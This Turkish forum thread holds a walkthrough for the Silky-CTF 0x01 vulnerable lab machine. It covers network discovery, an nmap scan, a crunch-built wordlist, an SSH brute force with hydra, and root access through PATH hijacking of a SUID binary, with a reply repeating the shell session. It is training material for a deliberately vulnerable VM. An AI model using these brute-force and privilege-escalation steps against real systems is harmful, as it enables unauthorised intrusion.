Silky-CTF: 0x01 Zafiyetli Makinesinin Çözümü//"P4RS

P4RS · 17 Ara 2019

Merhabalar TürkHackTeam ailesi, bugün sizlere "Silky-CTF: 0x01 Zafiyetli Makinesinin Çözümünü" göstereceğim.

https://www.vulnhub.com/entry/silky-ctf-0x01,306/

Makine İsmi: Silky-CTF: 0x01

Yayınlanma Tarihi: 27 Nisan 2019

Yapımcı: Silky

Seri: Silky-CTF

Açıklama: Hedefteki Root dizinin de ki Flag'a erişmek

Dosya Boyutu: 2.5 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Kolay-Orta

İlk öncelikle makinenin IP adresini öğrenmek için

Kod:

sudo netdiscover

yazıyoruz.

Hedefimiz IP adresini bu şekilde öğrenmiş olduk.

NMAP taraması yaparak hangi portların açık olduğunu öğrenmek için

Kod:

nmap -A IP_ADRESİ

yazalım. Gördüğünüz gibi 22 ve 80 portları açık ve burada önemli olan mavi alana aldığım robots.txt ve notes.txt yolları

80 portunun açık olması bir site açık olduğunu anladım içeri girince apache tabanlı bir site olduğunu gördüm.

İlk robots.txt'e gittim beni notes.txt kısmına yönlendirdi oradan görüntü fakat Almanca bir yazı yazılmış.

Çevirdiğimizde "Şifreyi sayfadan yok etmesi gerekiyor, her şeye rağmen sonda ki 2 karakter kayıpmış. "

Siteye tekrar geldim ve kodlara baktığımda script.js dosyasında bir şeyler buldum.

Gördüğünüz gibi şifreye ait bir değer bulduk.

Bizlere ipucu olarak son 2 karakter kayıp demişti. Şifre listesini crunch aracı ile oluşturacağım terminale

Kod:

crunch 7 7 -t s1lKy^% >> sifre.txt

yazdım ve şifre listesi oluştu.

Hydra aracı ile de ssh servisine brute saldırısı yapacağız. Terminale

Kod:

hydra -l silky -P sifre.txt IP_ADRES ssh

yazalım ve şifremizi alalım.

SSH olarak bağlanmak için terminale

Kod:

ssh silky@IP_ADRES

yazalım.

SUID özellikli dosyaları aradım ve burada ki /usr/bin/sky dosyası gözüme takıldı ve terminale

Kod:

/usr/bin/sky

yazdırdığımda Almanca bir metin ve root yazdığını gördüm.

Almanca bir metin ve whoami komutu çalıştırılmış.

Kök ayrıcalığını yükseltmek için PATH değişkenini kullanacağım. Bunun için

Kod:

echo '/bin/sh' > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/sky

ilginç bir şekilde id yazdığımda root yetkisini alamadım fakat

Kod:

cd /root

yazdığımda giriş yaptım ve flag.txt dosyasını yazdırmam da bir izin hatası almadım :trl bayrağı da almış oldu

)

Konum bu kadardı arkadaşlar, başka bir konuda görüşmek üzere sağlıcakla...

Rumexus · 17 Ara 2019

Elinize sağlık hocam.

By Ghost · 17 Ara 2019

Elinize sağlık hocam sade ve güzel bir anlatım yapmışsınız

:RpS_thumbsup:

PourLa · 17 Ara 2019

Elinize sağlık hocam güzel bir anlatım olmuş

P4RS · 18 Ara 2019

Rumexus' Alıntı:
Elinize sağlık hocam.

By Ghost' Alıntı:
Elinize sağlık hocam sade ve güzel bir anlatım yapmışsınız :RpS_thumbsup:

PourLa' Alıntı:
Elinize sağlık hocam güzel bir anlatım olmuş

Beğenmenize sevindim arkadaşlar

)

GZM16 · 18 Ara 2019

Ellerinize sağlık hocam.

cockpyte · 18 Ara 2019

Ellerinize sağlık hocam bilgilendirici ve yararlı bir konu olmuş.

P4RS · 19 Ara 2019

GZM16' Alıntı:
Ellerinize sağlık hocam.

cockpyte' Alıntı:
Ellerinize sağlık hocam bilgilendirici ve yararlı bir konu olmuş.

Beğenmenize sevindim arkadaşlar

)

ZoRRoKiN · 4 Ocak 2020

id yazdığınızda yetki alamıyorsanız bir de şu şekilde deneyin.

Kod:

silky@Silky-CTF:/tmp$ cd /tmp
silky@Silky-CTF:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
silky@Silky-CTF:/tmp$ echo '/bin/sh' > whoami
silky@Silky-CTF:/tmp$ chmod 777 whoami
silky@Silky-CTF:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
whoami
silky@Silky-CTF:/tmp$ export PATH=/tmp:$PATH
silky@Silky-CTF:/tmp$ /usr/bin/sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. 
gezeichnet:
# id
uid=1000(silky) gid=1000(silky) euid=0(root) Gruppen=1000(silky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner)
#

P4RS · 4 Ocak 2020

ZoRRoKiN' Alıntı:

id yazdığınızda yetki alamıyorsanız bir de şu şekilde deneyin.

Kod:

silky@Silky-CTF:/tmp$ cd /tmp
silky@Silky-CTF:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
silky@Silky-CTF:/tmp$ echo '/bin/sh' > whoami
silky@Silky-CTF:/tmp$ chmod 777 whoami
silky@Silky-CTF:/tmp$ ls
hsperfdata_root
pulse-PKdhtXMmr18n
systemd-private-d672f2af828d44d481839d78868a14d5-apache2.service-V58Rge
systemd-private-d672f2af828d44d481839d78868a14d5-colord.service-a7R6Hh
systemd-private-d672f2af828d44d481839d78868a14d5-rtkit-daemon.service-8bWI5m
systemd-private-d672f2af828d44d481839d78868a14d5-systemd-timesyncd.service-HmZtVn
whoami
silky@Silky-CTF:/tmp$ export PATH=/tmp:$PATH
silky@Silky-CTF:/tmp$ /usr/bin/sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. 
gezeichnet:
# id
uid=1000(silky) gid=1000(silky) euid=0(root) Gruppen=1000(silky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner)
#

Bilgilendirme için teşekkür ederim hocam

)

Silky-CTF: 0x01 Zafiyetli Makinesinin Çözümü//"P4RS

P4RS

Özel Üye

Rumexus

Kıdemli Üye

By Ghost

Katılımcı Üye

PourLa

Uzman üye

P4RS

Özel Üye

GZM16

Katılımcı Üye

cockpyte

Yeni üye

P4RS

Özel Üye

ZoRRoKiN

Özel Üye

P4RS

Özel Üye

Sosyal medya sayfalarımız